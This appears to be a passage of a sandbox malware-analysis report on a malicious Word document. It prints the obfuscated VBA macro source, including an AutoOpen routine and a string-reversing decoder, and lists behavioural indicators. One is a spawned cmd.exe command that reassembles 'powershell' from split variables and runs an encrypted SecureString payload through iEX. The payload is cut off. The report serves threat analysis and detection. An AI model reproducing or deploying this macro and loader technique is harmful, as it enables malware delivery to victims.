hOszVUuFQUOYq + 7214511 * RwalIJRLZzQOu * (440507 / TUEGRwHsHRmCi / 309345 - Tan(LJDTEs / CBool(bKjPDSwFFA / 708282 / BuTjTzJFTT))))MsJPddN = gjHBjhbyuf(WfHIujbNMNc, 25, 15)MTzFiUnVwSG = "GMwcIQA & nXIWkzZSYWkK zqsYwLtUMjsADtaqTch"WblCkU = tapNRRRSa = tADRtkCOTS = (3838939 / RfRUJ + 8634014 * haNpY * (2865134 / TmiOKn / 5467678 - Tan(mjBifPkVjws / CBool(IJwzIYOsAfKfC / 6904762 / PkFIjaht))))Jrwzw = hSbNozEiq = ZAKphGlYjjG = (4738870 / fvwUliqLP + 5167417 * OihLavw * (243371 / AdiGZDwX / 1543646 - Tan(znJwvRpcSzATJ / CBool(vbDZZwonFE / 4198258 / Nsuij))))nuujzXVPTqz = gjHBjhbyuf(MTzFiUnVwSG, 20, 19)kvtdJGZLj = "sRhnLFlidjrjHtmo^C% %cEp^S^mo^C% IIKSRfsEjc"DiIPcPAXDl = UPzoZlRUz = zspSEUDzo = (3840327 / iUdqXzrV + 5050974 * RiSJOodXvhJTOO * (1400822 / UwsHYcJJlv / 3788747 - Tan(BnawZbhKXIqjaZ / CBool(mGOFPjzdudSXp / 4707671 / XTUfWI))))dzpLulEEWkV = HKumjzCLG = hwkXCXp = (865081 / DKfUGEr + 7264981 * lXLuDjf * (9158819 / TimuRoRk / 4734670 - Tan(BGzdQR / CBool(wbpoioLo / 5123815 / AmvAsGEWWbI))))dpJGfAk = gjHBjhbyuf(kvtdJGZLj, 11, 25)bbWqbSbJJ = "SmlfzfXlXfqjj%cEp^S^zFwAPhlpPdQnizo"fcfkRjSV = zawDEUjjU = NClzizYahkr = (1331390 / VPjwUb + 4518355 * QiWBzDLG * (3947267 / GAQHTfpbEYb / 2671225 - Tan(dsScnVW / CBool(IwQzUPw / 6452319 / MTNClGsOvEJsXw))))MIcYmhHOZ = qCTtJfaXl = SwDzJzPruHMIAN = (8475946 / ZOsQMXlzZuBW + 7841790 * VohOj * (7465046 / sEvoS / 9611288 - Tan(miBFBXF / CBool(fUlvNFa / 2914038 / tCrlXaliFihJwc))))InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 7)XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftDVqFWoShnd"kWMEMBfq = JVVntWawi = AEJAHqtoVjJ = (4473432 / XqIaMjDi + 4941923 * ZUqjOAk * (1863841 / WbifBKvI / 1102920 - Tan(XzomDzz / CBool(vNMizbtkjRKi / 7875512 / apAppKGPRbwX))))GZpckzMhf = BMkhmjROo = GsiHlRiiwbWmYz = (7247502 / Hmijwlj + 4948824 * hzzfbMawi * (6731329 / LiYoln / 5635332 - Tan(BPnkvZbfj / CBool(zVMEhD / 3436798 / zWOvquQcBY))))kJQbk = gjHBjhbyuf(XPHfTP, 5, 5)PTJPLcdqonj = "sKWNn V/ kQUlqz"smwXnkAVLtk = CNlHIqKaQ = caBlSu = (6304415 / JaSYSQZczESqUB + 4012308 * rNrELojILqsCQ * (269042 / kscPtsd / 9112090 - Tan(ijtGIZoaF / CBool(uFDcnVq / 1980548 / bYWLvth))))BJirSRMj = wsmbwOSWW = udAlCRwFHF = (6395548 / ptChQTwL + 4021763 * MabwoiNjmjGIbN * (1911824 / ZGaGooAiCs / 4782500 - Tan(zwZKKwQZ / CBool(FdSsbS / 166193 / hSpXou))))jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 21)uiZcrs = "kDkYzNHcdKUiHwpduGjwlLwoIiGhszUKziJOiFfMjq zYAimaj"bVtOMZUuzBi = rFLmlrEni = wuroZwoNq = (8241912 / uXrjznDV + 3631389 * hibMUJlj * (5816245 / lFBZIzPKEShEbA / 9398398 - Tan(TFoDARLDPLP / CBool(FnCiMrioWS / 4771533 / YtQzlcGbPmpjua))))oKwalV = wTuzJwjnE = QDrkSILA = (6204466 / fHALSnFoNSwVj + 7307960 * OtYIcNloAjhkW * (1777173 / aoADvr / 3639129 - Tan(fWrvZmSuUFr / CBool(PnrDd / 8830541 / AbkCifGr))))jwhPS = gjHBjhbyuf(uiZcrs, 6, 24)HNljdjwLo = "wwXFzzcMonZlqwjhYkaR c/ LEAMJ"kwYnIhjTMT = vnpIqIuVz = RccLVu = (7951360 / TdfaUZLnR + 5225322 * qoZRjzDo * (1401300 / AFAZomNbfc / 997439 - Tan(EvBXUSPzCrTEH / CBool(sLtNRFit / 3669722 / fBfmzLmwL))))RPFvacwunvi = zkiPLckYK = JmwSVuCiR = (2011388 / LLbdsTnczrEUsK + 6699508 * vhkhhYT * (1882610 / iiKsudUoMlYC / 7268340 - Tan(JzvKiERE / CBool(njHAhc / 3488817 / sSrJlckEOkff))))dnviYZlaFD = gjHBjhbyuf(HNljdjwLo, 6, 15)VziGLuPjjz = MsJPddN + jwhPS + kJQbk + nuujzXVPTqz + dpJGfAk + InXrLQbYI + jKofwjNlE + dnviYZlaFDYKLJNbklN = kFUdaWMnc = LuwfjuJXULFU = (3753669 / YjcUznGsjZHM + 4560419 * LFYRmwUlaib * (3038198 / DPaIQ / 7297380 - Tan(FqurqpjSNYY / CBool(WdMOmoiVS / 7553105 / wshiCc))))GRrapbVLh = awRBXBGEt = qBnUiQPRjv = (9767410 / GdqGHj + 9320901 * CrCFNlDQPHr * (7669279 / ILbTwJKaJoPi / 3406306 - Tan(oLRuZINYzwhHw / CBool(zCZDKVw / 3435031 / nLWmGtD))))mXvuPFwNS = fajMcmpMz = GOLXwsWvdj = (565143 / GfwLJLCzt + 755953 * lfuOFnA * (4170878 / ofmobA / 9796525 - Tan(tJUdP / CBool(UEQQcd / 2012897 / hCCZs))))End Function", File "bOZoJDmQi.bas" (Streampath: "Macros/VBA/bOZoJDmQi") has code: "Sub jwAPrmtHfWYiZU(GhRoHsczow) On Error Resume Next Dim JZYbU() ReDim fmArWrcK(2) NGJpzoFL(0) = 575443 VcaHEzMQr(1) = 5463778 jDCIwmUm = Loo - 7010483 odsiWozBLENVF = 9803903 * 7737006End SubFunction gjHBjhbyuf(ByVal ZzbnrCODBCS As String, wwTmqTMcXJzc, JWfzwYdiwmSu)On Error Resume NextFfwrJbliv = iCGjwClYS = jziciLNPfXG = (2618076 / DTtGXuaOCuwzTh + 3505836 * JToCZ * (3520940 / XDOjwMFKoREC / 2515579 - Tan(vNirRd / CBool(ldOdu / 2517980 / ERKYliWDI))))OiCwkHhOi = FwNFKLIok = ZzCBzjFWGfRi = (6771038 / EPNPjUdvzzpQJ + 9841920 * zQwukd * (1719629 / cDNikbi / 2542376 - Tan(NWAuzsHQI / CBool(ADMiaGPGPU / 7658354 / NvDlMSqsUQmSCm))))wMCXpiczI = IQUnXUUTs = OIErLjoaPKj = (3288017 / fnIDErfJWNnuV + 8366725 * SXzztjnitU * (8251802 / AENpZrWoAPQQb / 2596605 - Tan(suRwqpJHr / CBool(lXJsIOj / 2593180 / iFIYN)))) RaRmBVj = wCiDG + StrReverse(ZzbnrCODBCS) + WfKvjcYABrwiaHLwiiiJlMf = foUMwsBhC + RaRmBVj + jUjWEtrmfEkbPrzwYlK = MznIntYjl = lCYjvw = (8093711 / NXfJPLs + 7163975 * ZcNzT * (2949956 / qavLwdfKF / 6129768 - Tan(BLuTvJlLNiCkb / CBool(BpzGYHSm / 259930 / VAiOksVEjSqZJ))))FjDNIBsnp = UvuojDjYb = KDwuiWa = (4187368 / wBIZcf + 8797874 * UtJlIDffj * (3884010 / LSYKrbPFHmYrhf / 6748408 - Tan(oMVSImdLfRdB / CBool(SOvCi / 1926873 / arRwMamnwBbFZ))))OrTOBnZoM = iZzNFpYdo = VrOzu = (4524736 / iApPdq + 4639370 * lbujArkCNM * (8440716 / zVzPS / 2555428 - Tan(khzuYqwFY / CBool(zAiZlTNdznLkoB / 6987210 / XGNDa)))) ppiHKsb = QSotmjWqEmMDQM + Mid(iaHLwiiiJlMf, wwTmqTMcXJzc, JWfzwYdiwmSu) + aNBjmUZMztwJVTp = sVYzkQlrj = HGjZYlkYuwt = (2190687 / ocrFoAnW + 98932 * OtqfQbspV * (4050253 / fOpma / 1506507 - Tan(lbXwjAk / CBool(sLwqsKGkV / 6108094 / GTwBHXqSJOB))))SOtalZzRN = qutjjsicr = dUHsBtpZQ = (4721764 / ibIrsizSYhkDS + 8366929 * aNVOtOa * (7009979 / jLVrjvzjtXHT / 7044525 - Tan(oKjJSrtRoBpTb / CBool(BicHr / 4711404 / hMGmdiA))))gjHBjhbyuf = ppiHKsbJvjspVhDN = EHtrOWTBM = vhOuzcMj = (1342472 / aXpIsHtRziFXwR + 4536538 * zhvKt * (928905 / ImSvAkQdpa / 1147832 - Tan(hRkwHdCEiOXj / CBool(XziikwEVwjVZMs / 6416776 / AQzsiqiNjoj))))End FunctionSub AruPjwdkmwEdB(kkOYukUX) On Error Resume Next Dim zarRhRRvvQN() ReDim FmGqOPwu(2) MUqNF(0) = 9496252 KuvVdJzorjwTUD(1) = 1643269 nwfwHij = Loo - 4113443 cflGAEbTS = 7173812 * 261001End SubSub AutoOpen()On Error Resume NextUsrvoRwhT = cZwDGDQaw = bOazAdMiqcUAC = (3456340 / tvFjKp + 6874729 * BvDhhzznBVbJnt * (8979321 / RcjHEzcXjwNIL / 8149706 - Tan(AsPYBwwiitoS / CBool(aIUzANShGc / 8930458 / SfAkl))))ocLjbRXVs = uVzANPjzz = cOHzYGuQU = (4162058 / RvuzELHwzrw + 5799807 * TzkGOi * (4278790 / hcIXhfnaj / 260271 - Tan(zKcZD / CBool(JDZzw / 6336480 / kAiaWnCqzNk))))SlZXjUXSp = tizqXhDEa = VivcnhAMEszMAw = (8603081 / RdlXFb + 6241100 * mFCoDokzPCrBW * (1767545 / qjHTZqhiBzQP / 4837778 - Tan(DruCEqii / CBool(IPICwzE / 8356324 / IsvqzIHAFbBq))))mZLdMKzwR = SDLUwERok = wGjHjYMulvD = (7169414 / dVWpwY + 6952277 * HsSppjWwEqMU * (8970612 / kGSiF / 9887288 - Tan(LDNhwizc / CBool(UPAtpNN / 3408423 / oqwhFrQMYkPXR))))SkXvoEHtB = XVqVwTBPX = AnQITiwWQjJON = (8185810 / wPVtY + 1639503 * wnTbrj * (8911087 / KINVXiCcEQqirJ / 8332024 - Tan(HzSAEj / CBool(wkqocornO / 5438362 / YBBrTYun))))QdhaSpwLT = rQutimOkj = ZnMdbFXkqGPj = (8988894 / QPsQKX + 9958922 * dYvziauOnGm * (6683091 / ADAGUvEG / 874159 - Tan(LVocP / CBool(zaIpuJohdXzqb / 3728533 / tLlQLs))))Application.Run "zFGYQzFpKYzFO"
SHzYRwHKqcvZYUkb = tziUqjita = OScwzOiluSJCM = (732925 / mkfuU + 7095966 * zCdzLGdc * (2809881 / LZwZitij / 8977252 - Tan(ZRRrlaUDwwwF / CBool(uVaSwC / 4659414 / RDrrmH))))bDqANZzuf = kmOlmZjPU = UCEIaj = (5860312 / fHNazwTsA + 1119273 * kfIzqqfkRliloW * (7251450 / EXuPUjDR / 7456153 - Tan(JmPRtYaR / CBool(ZLDNSuvNkzW / 4947329 / OfPVF))))qdBcrMYjt = UzsJLWmMH = JbUYW = (3575939 / QrEYkCXT + 6983264 * izUqolBbNsnK * (579861 / CXNMiVFf / 1905809 - Tan(whbUkzUqa / CBool(EOnLUpTzIZj / 1077194 / nWMoLpPhCnzt))))HKhqPYzjT = MnkCroCIW = qqsozXJJBLB = (381542 / pRNflGtBjV + 4034076 * jblTAMZjDG * (645148 / VjTFPvY / 3541043 - Tan(LuliIQB / CBool(iHUXNOvYpA / 9802786 / VYjNwJCnnl))))nzCQXjAos = wYCUwirIU = hZvZqonLX = (6297233 / OOpwUXUwrOXBIC + 672742 * DlfGBhPF * (2390232 / YLcjVcHtiJMXd / 2127173 - Tan(McIJYmWnV / CBool(asazjzkkcwJ / 3901106 / tvtPUu))))GjHUjoEGv = oFCYGzvkh = BKcnBMNsVPOiXC = (8702968 / DSXqIbs + 7765599 * WwkNHwKMTSjdtF * (1556379 / wjrhKizfr / 9349546 - Tan(MrnaRoriPc / CBool(NRDREjJlKM / 2985742 / LsBHlowF))))WLVzVfsSp = CbstSWads = PVGmPzXbhP = (6349087 / pSWIB + 9061378 * wYrqvI * (7178093 / ZtVbdtLhj / 3059376 - Tan(GAzDKCIwm / CBool(XKUfWvEYf / 2040423 / iaziMoDLil))))mscoGwVhn = mLzzCiAwH = GJEFucZAUzOFlI = (7767947 / RsqQwjqrXSi + 5595608 * AMswMXciniLjw * (87401 / ZhZrISQIFqC / 4405261 - Tan(NhbzwFUl / CBool(JYkMCiKik / 9587127 / HRqtnUcjDmF))))KAKUFGOjs = fzEYAGwQl = bFEnKwriJcdlhi = (697886 / jChZDQA + 964031 * JMSsh * (4508036 / zFLzGMz / 4700877 - Tan(XEHPuPV / CBool(mWujMuKF / 9868175 / BjZqcFRobWD))))End SubSub WCILjL(pJtqzFKcclLBu) On Error Resume Next Dim czoohc() ReDim zGowQ(2) zraAOzLJbH(0) = 8565218 kRcoCQVIBu(1) = 956827 XwjrrDFr = Loo - 6348268 KlCkzBjzBq = 9309066 * 2445692End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DFCFE796D0F05200A2.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-55183"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-55183"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Local\x64_10MU_ACB10_S-1-5-5-0-55183"
"Local\x64_10MU_ACBPIDS_S-1-5-5-0-55183" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at F1410000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E1720000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.E08="4""
Process "cmd.exe" (Show Process) was launched with modified environment variables: "PROCESSOR_ARCHITECTURE, CommonProgramFiles, ProgramFiles"
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"
Process "powershell.exe" (Show Process) was launched with new environment variables: "%PnudkPBnvRAjVPb%="DdvUuuz", %var5%="he", %var1%="p", %var7%="p", %var8%="ow", %var2%="ow", %ArQWcsLIfSRKwwT%="DWcTblEVs", %sdJUjBQbairSAth%="hrFapszPTzlTFB", %var3%="er", %btHkJMzDjjiWVZK%="WYrzozjmBIwYc", %var6%="ll", %var4%="s""
Process "195082.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "195082.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "195082.exe" (Show Process) was launched with modified environment variables: "PROCESSOR_ARCHITECTURE, CommonProgramFiles, ProgramFiles" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.463
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgA